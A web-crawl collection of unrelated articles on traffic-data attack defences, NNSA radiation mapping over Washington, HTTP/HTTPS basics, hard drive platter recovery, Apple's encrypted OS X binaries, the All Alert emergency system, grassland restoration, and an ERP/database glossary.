similar attacks on those systems are possible, he said. Companies that offer navigation apps can avoid this sort of attack by linking location information to one-time authentication that is time stamped and limited to a fixed amount of time, Jeske said. That would restrict the maximum number of valid data packets per time and device, helping to secure the system, he added. Loek is Amsterdam Correspondent and covers online privacy, intellectual property, open-source and online payment issues for the IDG News Service. Follow him on Twitter at @loekessers or email tips and comments to firstname.lastname@example.org
<urn:uuid:8e73b3aa-8939-433f-95f4-67bdc83ac47d>
CC-MAIN-2017-09
http://www.computerworld.com/article/2495379/malware-vulnerabilities/hackers-can-cause-traffic-jams-by-manipulating-real-time-traffic-data--resea.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00444-ip-10-171-10-108.ec2.internal.warc.gz
en
0.926632
843
2.546875
3
Data collected by a helicopter flying daily over Washington, D.C., through next week could one day be key to detecting a nuclear or radiological weapon amid the clutter of harmless radioactive sources scattered through the city. The National Nuclear Security Administration began sending the rotorcraft loaded with radiation-detection equipment over the nation’s capital on Dec. 27 and the flights continue through Jan. 11. The missions ultimately will cover 70 square miles, encompassing the entirety of the District of Columbia and possibly areas of neighboring Northern Virginia. The agency is a semiautonomous arm of the Energy Department responsible for helping prevent, or respond to, any nuclear or radiological incidents. A DOE-owned Bell helicopter with two pilots, a scientist and technician is making two flights per day on average, depending on the weather, the official said. Roughly 20 flights are anticipated in total. The intent is to identify natural emitters of radiation that already exist locally in the event that authorities are forced to hunt for a nuclear weapon, radiological “dirty bomb,” or another radioactive source that is lost or stolen. “There’s natural radiation in the environment all around us. The pavement emits radiation, and especially in D.C. there’s a lot of granite statues,” an NNSA official told Global Security Newswire. “Granite has natural radium and thorium and other radioactive isotopes. And that emits radiation.” The individual spoke on condition of anonymity, lacking authorization to comment on the project. “If they find something, then we can compare it to this background map and say we know that that’s a hot spot because there’s a statue here or there’s this natural feature that happens to be more radioactive than the area around it,” added the official. “It saves time in adjudicating anomalies in directed operations.” The rotorcraft carries crystal-based technology for finding gamma radiation, which can spread hundreds of feet into the atmosphere. “It goes back and forth, kind of like mowing the lawn at 150 feet in the air,” the official said of the specially outfitted helicopter. Analysis of the findings by the NNSA Remote Sensing Laboratory at Joint Base Andrews in Maryland should be completed shortly after the flight program finishes, the source added. The project is being conducted at the request of local law enforcement, but the official did not know the specific agency. The Energy Department has conducted hundreds of aerial searches since the 1960s for environmental remediation projects and background radiation checks. Selected areas of Washington and surrounding jurisdictions in Virginia were previously scanned about five years ago by the nuclear agency. It has conducted corresponding flight operations in New York City, Baltimore and the Bay Area of California, usually at the request of the municipalities, the official said. The agency has also trained police in cities including Chicago to use their own systems for the same end. Digital maps highlighting natural radioactive hot spots are then produced by NNSA specialists. In all cases, maps of the findings are submitted to the covered jurisdictions, the agency said.
<urn:uuid:f4bd30c0-ba70-4906-99ce-98c3c10d5483>
CC-MAIN-2017-09
http://www.nextgov.com/big-data/2013/01/nnsa-helicopter-now-hunt-radiation-washington-dc/60483/?oref=ng-channelriver
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00444-ip-10-171-10-108.ec2.internal.warc.gz
en
0.936195
647
2.734375
3
Http Protocol is a communication protocol consisted on a complete system that includes rules, designs and configuration for the digital messages, which are going to be exchanged between the computing organizations. HTTP (hyper text transfer protocol) as a communication protocol was anticipated in the year 1989 by 1.0 specification coauthor, Tim Berners Lee. This set of practicing rules is the key to connect to the web servers either over internet or intranet. Moreover, this protocol operates over another protocol’s top, named as TCP/IP. In OSI (open systems interconnection) Model, HTTP operates while residing at the uppermost’s layer, known as Application layer. Two main functions of this protocol are including: - To provide connection with web servers and after connecting to one, requested html pages are sent back to user the web browser (software application for the purpose of retrieving and presenting information). - Another function of this standard level http protocol is to supply requested file’s downloading from a destination server that can be a browser or http based application. A web browser as an HTTP client can send request for a file to the web server that is all time ready to handle such situation using http service as a result of demand. As, this protocol is the standard setting of a web browser so you can type either www.hotmail.com or http://www.hotmail.com, both cases will considered as same by browser. WWW is used this underlying protocol in order to make the messages formation and transmission clear over the internet. Anyhow, different responses of web servers and client browsers are performed using a number of commands. Entering URL of a site into the address bar can be meant as sending HTTP command to a specific server for getting the requested pages of that specified site. One more feature of this protocol is its state of independent commands accomplishment for which it is known as a stateless protocol because each command is executed autonomously. But an additional “s” with HTTP at its end indicates that requested site is a secure and an encrypted site. You can say that https is the grouping of http and SSL/TLS protocol. Purpose of https connection is to provide an authentic network’s web server detection using the encrypted communication way. Reason of https need and regard is due to the attached insecurity with http protocol that is subjected of eavesdropping or third person attacks which are made to deceive others by stealing their website accounts or other sensitive information. That’s why; this protocol is designed to resist such attacks made with malice. HTTPS is considered a good way to be secure against such attacks. You too can observe that money transaction related sites often used https connections over the internet. But Https should be considered as a separate protocol in the strict sense, because it is just the http exercising over a secure SSL/TLS encrypted connection. In the https message, everything including the headers, request, and response load is encrypted as a result. But https is different from s-http (secure http). Another term “http proxy” is referred to a bridge that can act as http server or http client.
<urn:uuid:56231109-2899-41a6-a6d8-1bc2eabb1c7e>
CC-MAIN-2017-09
https://howdoesinternetwork.com/2011/http
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00496-ip-10-171-10-108.ec2.internal.warc.gz
en
0.944124
639
4.15625
4
Introduction: Data Recovery 101 Gillware is rolling out a new blog series titled “Data Recovery 101”, in which our bloggers will take a closer look at each of the different components of a hard drive and explain how they work, how they fail and how we recover the data from each failure situation. The series will include five of the main components of a hard drive: platters, read/write heads, spindle motor, firmware and electronic components such as the control board and other circuitry. When a hard drive is functioning properly, these parts work together in an intricate balance. The parts are very delicate, and even the slightest malfunction can have disastrous consequences. We see a variety of different failures on a daily basis, both logical and mechanical, and most failures can be tied back to one of the five components mentioned above. In the blog series, we’ll analyze each failure to give you a better idea of what’s going on inside a failed drive. But we won’t stop there, of course. We’ll also give you an inside look at some of the advanced techniques Gillware uses to recover data from different failure situations. This post will focus on the part of the drive that stores the data itself: the platters. What are the platters? Platters are the thin, circular discs made of glass or aluminum inside the sealed hard drive enclosure. Depending on the capacity and age of the device, a hard drive can contain anywhere from one to 10 or more platters. Each platter surface is coated with an extremely thin magnetic substrate that stores the user’s binary data (1s and 0s) in the form of a magnetic field. When these 1s and 0s are arranged in a particular order, the device can read recognizable data like pictures, documents, spreadsheets and more. How do the platters work? In order to store information, the binary data must be written to the magnetic surface of the platter. To access the data, it must be read. Another crucial hard drive component, the read/write head assembly, is responsible for both of these functions. The read/write heads are tiny sensors that float just 5-10nm above the surface of the platters on a cushion of air generated by the platters spinning at thousands of rotations per minute. When operating normally, the airflow inside the hard drive chassis is smooth and consistent, resulting in the steady flight of the read/write heads over the platter surface. Although hard drives are not technically hermetically sealed devices (except for some of the new, ultra high density HDDs being built), the internal environment does need to remain free of dust and other contaminants to ensure that the heads can float unobstructed over the platters. How do the platters fail? In certain situations, the read/write heads can crash and contact the delicate platter surface. Since the heads are so close to the platters, even a tiny speck of dust, dirt or a fingerprint can have adverse effects on the operation of the drive (which is why it’s so important not to open hard drives outside of a cleanroom environment). The heads can crash for a variety of reasons including spindle motor failure, power surge or sudden loss of power, among others. While this can be an entirely separate issue, the real problem can be damage to the magnetic substrate caused when the heads contact the platters and spread microscopic debris throughout the chassis which can become embedded in the platter surface. In serious cases, rotational scoring occurs, leaving score marks in the magnetic substrate when the read/write heads touch the surface as the platters rotate. Though the damage may be microscopic, the debris continually impacts the read/write heads and eventually destroys them, making the drive inoperable and the data inaccessible. Even if the heads are replaced, the damage to the platters must be addressed, or any replacement heads will just get destroyed as well. How can you recover data from damaged platters? Sometimes, if the damage to the platters is too severe, the data stored on them can be unrecoverable. For example, some of the more extreme cases we’ve seen in our data recovery lab involve shattered platters, melted platters, or platters that have had the magnetic substrate completely removed from them from such a high degree of rotational scoring. When the platters are broken, incinerated or stripped of their coating, there is simply nothing to recover the data from. In situations where the magnetic substrate is largely intact, Gillware utilizes sophisticated equipment used by hard drive manufacturers, re-engineered for the purposes of data recovery, to measure and eliminate platter debris and imperfections. The process is known as burnishing. In order to undergo burnishing, the platters are removed from the hard drive chassis in a controlled, cleanroom environment. The platter is mounted on a custom fixture that spins the platter in excess of 10,000 RPM, which is nearly twice as fast as the platters rotate in an average hard drive. A robotic arm passes a specially designed burnishing head over the platter, which works as a precise scrub brush to remove debris and repair damage on the platter surface. Then the platters are remounted, the new heads are installed and the drive is calibrated. Although it will not be in perfect working order, the drive is now operational to a point at which the data can be successfully extracted from the device and recovered. To learn more… In the posts to come, you’ll learn more about the different hard drive components we discussed in this post (read/write heads, spindle motor and more) and how they work together to create a fully functioning hard drive. Additionally, we’ll show you what can go wrong with each of these components and how Gillware recovers data from different situations of hard drive failure. If you’re interested in learning more about how the burnishing process works, check out our burnisher blog post.
<urn:uuid:d5bd3b85-3575-4476-87e6-53e32da0c261>
CC-MAIN-2017-09
https://www.gillware.com/blog/data-recovery/data-recovery-hard-drive-platters/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171807.25/warc/CC-MAIN-20170219104611-00020-ip-10-171-10-108.ec2.internal.warc.gz
en
0.927094
1,241
3.5625
4
The company has encrypted critical parts of its operating system to protect it from software pirates, according to a researcher. A computer researcher has made public information that Apple Computer has encrypted at the binary level critical parts of its Mac OS X operating system. These "Apple-protected binaries" can serve to protect the OS from being pirated and also to make it "nontrivial" to run Mac OS X on non-Apple hardware, said Amit Singh, a member of Googles technical staff in Mountain View, Calif., and the author of "Mac OS X Internals: A Systems Approach." Singh has also given lectures on Mac OS X to the National Security Agency and at Apples main campus in Cupertino, Calif. According to Singh, the parts of Mac OS X that are protected include the Finder and Dock applications, as well as parts of Rosetta (Mac OS Xs application for running Power PC applications on an Intel-based Mac) and services that manage the user interface. Singh noted that his list was not exhaustive. Much of Mac OS X is open source , including Darwin , an entirely functional, open-source operating system based on FreeBSD 5.0 and the Mach 3.0 microkernel, and the basis for Mac OS X. The Apple-protected binaries signal their protected status by setting a special bit in the header, Singh said. When any binary is called upon by the system, the kernel checks to see if it is Apple-protected; if it is, the kernel unencrypts the code through an "unprotect" operation. This operation, Singh noted, includes a "dsmos_page_transform" command, in which "dsmos" stands for "Dont Steal Mac OS X". He also found a "Dont Steal Mac OS X.kext" kernel extension in the operating system. "A lot of times, encrypted binaries are used as piracy protection," said Bruce Schneier, founder and chief technology officer of Mountain View, Calif.-based Counterpace Internet Security. "Its a common technique," he said. "But more often, and probably what its used for here," he added, "is as anti-reverse engineering." Click here to read about an exploit for an unpatched vulnerability in the Apple Airport driver that ships with some PowerBook and iMac computers. Schneier noted that encrypted binaries can affect application performance due to the extra decoding step before they can be executed. However, he said, "As computers grow faster, theres more processing power to do stuff like this. "The devils in the details," he said. Speaking to concerns about privacy, Schneier said, "Theres nothing sinister here." "This is a method for Apple to protect its code," he said, adding that for people who still want to try to get Mac OS X running on commodity PC hardware, "you can get around it, but not easily." Apple representatives were not available to comment. Check out eWEEK.coms for the latest news, reviews and analysis on Apple in the enterprise.
<urn:uuid:957756da-386b-4e6a-9488-3f2899599d9a>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Apple/Apple-Places-Encrypted-Binaries-in-Mac-OS-X
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00372-ip-10-171-10-108.ec2.internal.warc.gz
en
0.96068
640
2.796875
3
Everyone has heard emergency alert signals transmitted over television and radio, usually followed by, "This is only a test ..." But what if it were a real emergency? People watching TV or listening to the radio would certainly be alerted. But what if the emergency happened in the middle of the night, when few people watch TV or tune in to the radio? The original Emergency Broadcast System (EBS), developed in 1963 under the Kennedy administration, was replaced in 1994 by the Emergency Alert System (EAS), developed by the FCC. The EAS expanded the EBS to more outlets and allowed more detailed information to be distributed, but even the EAS relies extensively on television and radio to distribute warnings. The FCC simply had no way to envision the huge technological changes occurring between then and now. "Since the events of Sept. 11, there's been a realization that the emergency alert system, which was originally designed for a Cold War scenario, needs to be a lot more responsive to 21st century technology," said Reynold Hoover, director of the Office of National Security Coordination in the Federal Emergency Management Agency (FEMA). "We need to be able to alert more people more of the time in the event of a crisis." FEMA, which manages the EAS, is now teaming with other federal agencies as well as state technology leadership and the private sector to create the All Alert system. The new system will build on the Amber Alert infrastructure to more efficiently alert the public via a wide variety of communication devices, when emergencies occur. In 2004, an amendment to the 9/11 Intelligence Reform Bill mandated a one-year pilot to improve distribution of emergency warnings, including upgrading to satellite technology. FEMA, the Association of Public Television Stations and the Department of Homeland Security's Information Analysis and Infrastructure Protection Directorate are working with other federal departments and agencies, private communication companies and broadcasters to improve public alerts during times of crisis. All Alert will utilize the digital capabilities of the nation's public television stations and the voluntary participation of cellular phone service providers; public and commercial radio; television broadcasters; satellite radio, cable and Internet providers; and equipment manufacturers. "We've been exploring today's technologies to expand the system so everyone, no matter where they are or at what time -- day or night -- will be assured of receiving emergency information followed by an appropriate protective action," said Hoover. The amendment also requires the federal government team to work with the National Association of State Chief Information Officers (NASCIO), which will help retool the Amber Alert child abduction system into a technology backbone for the new All Alert system. The goal is to adapt the Amber Alert platform to a common messaging infrastructure that will be owned at the federal and state levels. "When an alert goes out to the public, it will be very easy for anyone to pick up the message via a variety of communication tools," said Chris Dixon, issues coordinator with NASCIO. "We want to keep it totally open, so as communication channels evolve and the methods with which people get information change, our message platform will remain a steady fixture." All Alert will greatly expand the EAS, which is restricted in how much information it can provide and its ability to supply follow-up instructions, such as where people should seek shelter. "Today people tend to call 911 to find out more, and they end up tying up that system," said Peter Ward, expert consultant to NASCIO on public warning. "With EAS, if you needed to reach people at night, you would reach less than 3 percent of them. Even during daytime under ideal circumstances, you would likely only reach 30 percent. When time is of the essence, you need to reach the majority of the population." The EAS also has little redundancy built into it. All Alert will be highly redundant, so if one system goes down, there will be several available to back it up. A Customizable Solution All Alert is not just about the technology involved. The federal team already successfully demonstrated the ability to receive, broadcast and rebroadcast simulated emergency messages from FEMA to participants from the broadcast, cable and wireless telecommunications industry, and emergency management officials. Instead, the challenges behind All Alert revolve around bringing parties together to collaborate on building a backbone that will allow the public to determine, which alerts to receive and over which devices. "The long-term plan is [that] citizens will be able to decide which types of warnings they want to receive," said Ward. "The ability to receive warnings will ultimately be built into all kinds of electronics, and when a warning applies to a person, it would be relayed to them. The technology is already there. This is all about building the backbone." That's where the Amber Alert system can help, said Todd Sander, incoming director of the Amber Alert 911 Consortium, explaining that the idea is to build All Alert on the Amber Alert infrastructure. "Amber Alert becomes important because it provides a platform for states and the federal government to work together," Sander said. "My first and most important job is getting the states that aren't part of the Amber Alert Consortium to join so we can get everyone focused on connecting to each other and the federal government. We can build the backbone from there." The original concept behind the Amber Alert system was to bring the best technology to a system that didn't work very well. "First we eliminated the time lag. Amber Alerts can be activated within 10 minutes of an initial report about a missing or abducted child," said Chris Warner, developer of the Amber Alert system and founder of Engaging and Empowering Citizenship. "We then geocoded the system so it knows who needs to get the alert and sends it only to whom the alert is relevant. It also uses prediction modeling to let other agencies know when they should be on the lookout and prepared to respond -- engaging people not only where the event happened, but also where it could potentially expand in the following hours." Warner, Sander and NASCIO are now responding to the federal government's request to incorporate Amber Alert technology into All Alert. But while Amber Alert is one specific alert coming from one specific first responder group -- law enforcement -- All Alert will include multiple types of alerts from multiple first responder groups that are then passed to the public. "The challenge is getting all the practitioners together and making sure we have a system that serves the needs of all the different interest groups," said NASCIO's Dixon. "But if we don't do this now, working together, the federal government and each state would eventually build their own separate systems. Trying to tie them all together at that point would probably take an act of divine intervention." NASCIO's role is to help bring all 50 states and the federal team together to make a system that serves a wide variety of first responder groups and handles alerts from the very mundane to the very worst instances. Dixon said private-sector players, including communications companies and broadcasters, have not been difficult to convince, because they see the All Alert system as a valuable service they can offer their customers. "The early indications with Amber [Alert] is that private-sector companies almost clamor for the opportunity to do this," he said. Working together, the federal team, along with the NASCIO team and the private-sector players, hope to have a pilot All Alert system ready to demonstrate by September 2005. Once All Alert is up and running, those involved say it will let first responders do their jobs faster while relieving some of their burden. "This will make first responders' jobs easier because they can get information out to the community fast. The more informed the community is, the more able they are to respond appropriately," said Sander. "A lot of the panic and danger that occur during an emergency stem from the confusion generated when the public doesn't know what's going on. This is the first thing I've seen in 15 years of working in the government technology arena that breaks down the barriers between jurisdictions and can really make a huge difference in people's lives." For the public, the All Alert system means reducing some of that confusion so they can better respond to emergency situations. "We can significantly improve our early warning systems in the United States in a short period of time if we can work together," said Ward. "Amber Alert proved the coordination can be done. Now we just need to cooperate and expand to reach more people using more outlets."
<urn:uuid:0cf66ee2-0297-4a26-a07a-c1ceb2fffacc>
CC-MAIN-2017-09
http://www.govtech.com/public-safety/99417349.html?page=1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00372-ip-10-171-10-108.ec2.internal.warc.gz
en
0.957041
1,738
3.171875
3
Kelemen A.,Debreceni Egyetem TEK | Kelemen A.,Debrecen University | Torok P.,Debreceni Egyetem TEK | Torok P.,Debrecen University | And 8 more authors. Journal of Landscape Ecology | Year: 2010 Spontaneous succession in lack of restoration focused case studies is often underappreciated in restoration. We studied the regeneration of alkali and loess grasslands in extensively managed (mown twice a year) alfalfa fields using space for time substitutions. In our study we addressed the following questions: (i) How fast is the disappearance of the perennial alfalfa following abandonment of intensive management from vegetation? (ii) Is the course of vegetation development in extensively managed alfalfa fields different than in abandoned crop fields formerly cultivated with short lived crops? (iii) How fast is the regeneration of native grasslands in extensively managed alfalfa fields? We found that alfalfa gradually disappeared from vegetation, and its cover was low in 10-years-old alfalfa fields. We also detected a continuous replacement of alfalfa by perennial native grasses and forbs. No weed dominated stages were detected during the spontaneous grassland recovery in alfalfa fields. Our results suggest that the recovery of species poor grasslands is possible within 10 years. The partial recovery of loess and alkali grasslands not require technical restoration methods in alfalfa fields where nearby native grasslands are present. Source
<urn:uuid:5f82d2b8-9388-4640-ac75-48d540b01311>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/debreceni-egyetem-tek-645188/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171171.24/warc/CC-MAIN-20170219104611-00016-ip-10-171-10-108.ec2.internal.warc.gz
en
0.922767
321
2.578125
3
When will you move your ERP to the cloud? We are on the cloud already! from 2-3 years from 4-5 years Total votes: 30 Baanboard at LinkedIn By patvdv at 19 Feb 2008 - 23:52 - ACID Transactions - ACID Transactions satisfy the properties of Atomicity, Consistency, Isolation, and Durability. As complex update operations on possibly distributed data, transactions are subject to various failure conditions. For instance, some step of a transaction may violate an integrity constraint, or the connection to a remote database may get lost, or the server running the transaction application may crash during the execution of a transaction. Atomicity denotes the requirement that a transaction needs to be all-or-nothing: either it executes completely or not at all. If all steps of a transaction have been performed successfully, the transaction commits, making all involved updates permanent. If some step fails, the transaction aborts, rolling back all involved updates. A transaction program should maintain the consistency of the databases it updates. Since the internal consistency of a database is defined by its integrity constraints, this means that all integrity constraints have to be satisfied when the transaction is completed. For performance reasons, transactions are executed concurrently by interleaving the execution of their single steps. Special techniques (such as locking mechanisms) are needed to avoid interference between transactions accessing the same database objects. Referring to concurrent transactions, one says that the isolation property is satisfied if their effects are the same as if they were run one at a time in some order, or, in other words, if they are serializable. Finally, a transaction is durable if all of its updates are stored on a permanent storage medium when it commits. This is usually achieved by writing a copy of all the updates of a transaction to a log file. If the system fails after the transaction commits and before the updates go to the database, then after the system recovers it rereads the log and checks that each update actually made it to the database; if not, it re-applies the update to the database. Notice that unlike atomicity, isolation and durability which are guaranteed by the transaction processing system, maintaining consistency is the responsibility of the application programmer. - A computer program that can accept tasks from its human user, can figure out which actions to perform in order to solve these tasks and can actually perform these actions without user supervision, is an example of a software agent. More generally, any system that is capable of perceiving events in its environment, of representing information about the current state of affairs, and of acting in its environment guided by perceptions and stored information, is called an agent. If the environment is virtual, such as the Internet, we deal with software agents. If the environment is physical, we deal either with natural agents such as human beings and animals, or with artificial physical agents such as robots and embedded systems. The term agent denotes an abstraction that subsumes all these different cases. Typical examples of software agents are web shopping assistants and life-like characters (artificial creatures) in computer games. Typical examples of artificial physical agents are the entertainment robot Aibo by Sony and the unmanned NASA space vehicle Deep Space One. It is expected that software agents capable to assist their users to cope with the increasing complexities caused by the accelerating and virtually uncontrolled growth of the World Wide Web will play a major role in the future. The term agent is sometimes used as a synonym for intelligent system. But, in general, agents do not have to be 'intelligent'. In software engineering, for instance, the ability of an agent to communicate and cooperate with other systems in a exible manner, and the ability of a mobile agent to migrate to another computer providing more resources via suitable network links, are considered more fundamental than any form of 'intelligence'. The philosophical basis for the agent paradigm in computer science is the concept of intentional systems introduced by Daniel Dennett in (Den71) to characterize systems whose behavior can be best explained and forecasted by ascribing them beliefs, goals and intentions. Following Dennett, Yoav Shoham proposed in (Sho93) a mentalistic approach to model and program agents, called Agent-Oriented Programming. In this approach, the data structures of an agent program reflect basic mental components such as beliefs, commitments, and goals, while the agent's behavior is determined by reaction rules that refer to its mental state and are triggered by events, and possibly by its planning capabilities for pro-actively achieving its goals. An important feature of agents is their ability to communicate and interact with each other. For artificial agents, communication is normally implemented by an asynchronous message passing mechanism. Agents created by different designers must speak the same agent communication language for expressing the type of communication act, and must refer to shared ontologies for being able to understand the contents of the messages of each other. Conversations between agents often follow a certain protocol that defines the admissible patterns of message sequences. Similarly to the notion of objects in software engineering, the term agent denotes an abstraction that leads to more natural and more modular software concepts. While the state of an object is just a collection of attribute values without any generic structure, the state of an agent has a mentalistic structure comprising perceptions and beliefs. Messages in object-oriented programming are coded in an application-specific ad-hoc manner, whereas messages in agent-oriented programming are based on an application-independent agent communication language. An agent may exhibit pro-active behavior with some degree of autonomy, while the behavior of an object is purely reactive and under full control of those other objects that invoke its methods. - Agent-Oriented Information Systems (AOIS) - represent a new information system paradigm where communication between different (software-controlled) systems and between systems and humans is understood as communication between agents whose state consists of mental components (such as beliefs, perceptions, memory, commitments, etc.). In enterprise information systems, for instance, the AOIS paradigm implies that business agents are treated as first class citizens along with business objects. - Business Rules - are statements that express a business policy, defining or constraining some aspect of a business, in a declarative manner (not describing/prescribing every detail of their implementation). Business rules may be strict or defeasible (allowing exceptions). They can be formalized as integrity constraints, derivation rules, or reaction rules. - Business Transaction - A sequence of actions performed by two or more agents, involving a flow of information and a flow of money, and normally also a flow of material or certain other physical effects. Usually, it requires some bookkeeping to record what happened. Today, this bookkeeping is done by the computer-based information systems of the involved business partners. Since an enterprise may participate in a great number of business transactions at the same time, this requires sophisticated information system technologies for guaranteeing high performance and consistency. - The Common Object Request Broker Architecture is an established standard allowing object-oriented distributed systems to communicate through the remote invocation of object methods. - Database Management System (DBMS) - The main purpose of a DBMS is to store and retrieve information given in an explicit linguistic format (using various symbols). As opposed to certain other types of information that are also processed in agents, this type of information is essentially propositional, that is, it can be expressed as a set of propositions in a formal language. In the sixties and seventies, pushed by the need to store and process large data sets, powerful database management systems extending the file system technology have been developed. These systems have been named hierarchical and network databases, referring to the respective type of file organization. Although they were able to process large amounts of data efficiently, their limitations in terms of exibility and ease of use were severe. Those difficulties were caused by the unnatural character of the conceptual user-interface of hierarchical and network databases consisting of the rather low-level data access operations dictated by their way of implementing storage and retrieval. Thus, both database models have later on turned out to be cognitively inadequate. The formal conceptualization of relational databases by Codd in the early seventies rendered it possible to overcome the inadequacy of the first generation database technology. The logic-based formal concepts of the relational database model have led to more cognitive adequacy, and have thus constituted the conceptual basis for further progress (towards object-relational, temporal, deductive, etc. databases). Driven by the success of the object-oriented paradigm, and by the desire to improve the relational database model, object-relational databases are now increasingly regarded the successor to relational databases. This development is being reflected in the progression of SQL, the established standard language for database manipulation, from SQL-89 via SQL-92 to SQL-99. - Data Warehouse - A very large database that stores historical and up-to-date information from a variety of sources and is optimized for fast query answering. It is involved in three continuous processes: 1) at regular intervals, it extracts data from its information sources, loads it into auxiliary tables, and subsequently cleans and transforms the loaded data in order to make it suitable for the data warehouse schema; 2) it processes queries from users and from data analysis applications; and 3) it archives the data that is no longer needed by means of tertiary storage technology. Most enterprises today employ computer-based information systems for financial accounting, purchase, sales and inventory management, production planning and control. In order to efficiently use the vast amount of information that these operational systems have been collecting over the years for planning and decision making purposes, the various kinds of information from all relevant sources have to be merged and consolidated in a data warehouse. While an operational database is mainly accessed by OLTP applications that update its content, a data warehouse is mainly accessed by ad hoc user queries and by special data analysis programs, also called Online Analytical Processing (OLAP) applications. For instance, in a banking environment, there may be an OLTP application for controlling the bank's automated teller machines (ATMs). This application performs frequent updates to tables storing current account information in a detailed format. On the other hand, there may be an OLAP application for analyzing the behavior of bank customers. A typical query that could be answered by such a system would be to calculate the average amount that customers of a certain age withdraw from their account by using ATMs in a certain region. In order to attain quick response times for such complex queries, the bank would maintain a data warehouse into which all the relevant information (including historical account data) from other databases is loaded and suitably aggregated. Typically, queries in data warehouses refer to business events, such as sales transactions or online shop visits, that are recorded in event history tables (also called 'fact tables') with designated columns for storing the time point and the location at which the event occurred. Usually, an event record has certain numerical parameters such as an amount, a quantity, or a duration, and certain additional parameters such as references to the agents and objects involved in the event. While the numerical parameters are the basis for forming statistical queries, the time, the location and certain reference parameters are used as the dimensions of the requested statistics. There are special data management techniques, also called multidimensional databases, for representing and processing this type of multidimensional data. For further research, see (Cod94, AM97, IWK97). - Derivation Rules (or deduction rules) - are used for defining intensional predicates and for representing heuristic knowledge, e.g. in deductive databases and in logic programs. Intensional predicates express properties of, and relationships between, entities on the basis of other (intensional and extensional) predicates. Heuristic knowledge is often represented in the form of default rules which may be naturally expressed using the weak and strong negation from partial logic (like in the formalism of 'extended logic programs'). While relational databases allow to define non-recursive intensional predicates with the help of views, they do not support default rules or any other form of heuristic knowledge. - Electronic Data Interchange, denotes the traditional computer-to-computer exchange of standard messages representing normal business transactions including payments, information exchange and purchase order requests. Besides the two main international standards for EDI messages, UN/EDIFACT and ANSI X.12, there are several vertical EDI standards. EDIFACT is administered by a working party (WP.4) of the United Nations Economic Commission for Europe (UN/ECE). The EDIFACT syntax rules have been published by the ISO as ISO9735. In (Moo99), it is shown that current EDI standards have the message structure proposed by speech act theory. The current EDI standards are beeing criticized because of a number of problems such as underspecified meaning, idiosyncratic use and in exibility. In 1999, a major initiative has been launched to replace the outdated EDI message syntax by a more exible XML-based framework called ebXML. - Enterprise Application Integration (EAI) - refers to the problem of how to integrate the increasing number of different application systems and islands of information an enterprise has built up over many years. The EAI problem also arises through the formation of a virtual enterprise or from merging two companies. While the integration of various islands of information including databases, sequential files, and spreadsheets, may be achieved through data federation systems, the inter operation between different application systems requires an asynchronous message exchange technology, also called message-oriented middleware (MOM). In addition, a message translation service is needed to transform the messages sent by one application to the message language of another application. An application-independent EAI message language, called Business Object Documents, is proposed by the Open Application Group. The integration of applications across enterprise boundaries is also called 'Enterprise Relationship Management'. - Enterprise Resource Planning (ERP) - systems are generic and comprehensive business software systems based on a distributed computing platform including one or more database management systems. They combine a global enterprise information system covering large parts of the information needs of an enterprise with a large number of application programs implementing all kinds of business processes that are vital for the operation of an enterprise. These systems help organizations to deal with basic business functions such as purchase/sales/inventory management, financial accounting and controlling, and human resources management, as well as with advanced business functions such as project management, production planning, supply chain management, and sales force automation. First generation ERP systems now run the complete back office functions of the worlds largest corporations. The ERP market rose at 50% per year to $8.6 billion in 1998 with 22,000 installations of the market leader, SAP R/3. Typically, ERP systems run in a three-tier client/server architecture. They provide multi-instance database management as well as configuration and version (or 'customization') management for the underlying database schema, the user interface, and the numerous application programs associated with them. Since ERP systems are designed for multinational companies, they have to support multiple languages and currencies as well as country-specific business practices. The sheer size and the tremendous complexity of these systems make them difficult to deploy and maintain. - Entity-Relationship (ER) Modeling - A conceptual modeling method and diagram language based on a small number of ontological principles: an information system has to represent information about entities that occur in the universe of discourse associated with its application domain, and that can be uniquely identified and distinguished from other entities; entities have properties and participate in relationships with other entities; in order to represent entities in an information system, they are classified by means of entity types; each entity type defines a list of (stored and virtual) attributes that are used to represent the relevant properties of the entities associated with it; together, the values of all attributes of an entity form the state of it; in order to represent ordinary domain relationships (or associations) between entities, they are classified by means of relationship types; there are two designated relationships between entity types that are independent of the application domain: specialization (subclass) and composition (component class). ER modeling was introduced in [Che76]. In its original form, it included the primary key concept as its standard naming technique, but did not include specialization and composition. The primary key standard naming technique proved to be inadequate since a standard name should be a unique identifier which is associated with an entity throughout its entire life cycle implying that it must be immutable. However, the basic idea of ER modeling does not depend on the primary key concept. It is also compatible with the object identifier concept of OO systems and ORDBs. This implies that ER modeling does not preclude the possibility of two distinct entities having the same state. It is therefore justified to view OO information modeling, such as UML class diagrams, as inessential extensions of ER modeling, and to regard ER modeling as the proper foundation of information modeling. - Information System (IS) - An IS is an artifact (or technical arrangement) for efficiently managing, manipulating, and evaluating information-bearing items such as paper documents, ASCII text files, or physical objects. Today, especially in enterprises and other large organizations, there are more and more computerized ISs implemented by means of DBMS technology. One may distinguish between private, organizational and public ISs. Typical examples of a private IS are personal address databases and diaries. The major paradigms of an organizational IS are transaction-oriented database (OLTP) applications (such as ERP systems) and query-answering-oriented data warehouse (OLAP) applications. Typical examples of a public IS are libraries, museums, zoos, and web-based community ISs. - Integrity Constraints - are sentences which have to be satisfied in all evolving states of a database (or knowledge base). They stipulate meaningful domain-specific restric-tions on the class of admissible databases (or knowledge bases). Updates are only accepted if they respect all integrity constraints. The most fundamental integrity constraints are value restrictions, keys and foreign keys (or referential integrity constraints). - denotes the ability of two or more systems to collaborate. At a lower level, this concerns the ability to exchange data and to allow for remote procedure calls from one system to another. At a higher level, it requires the ability to participate in the asynchronous exchange of messages based on an application-independent language (such as KQML, or FIPA-ACL). - Message-Oriented Middleware (MOM) - denotes a type of software systems for managing transactional message queues as the basis of asynchronous message passing. Well-known products 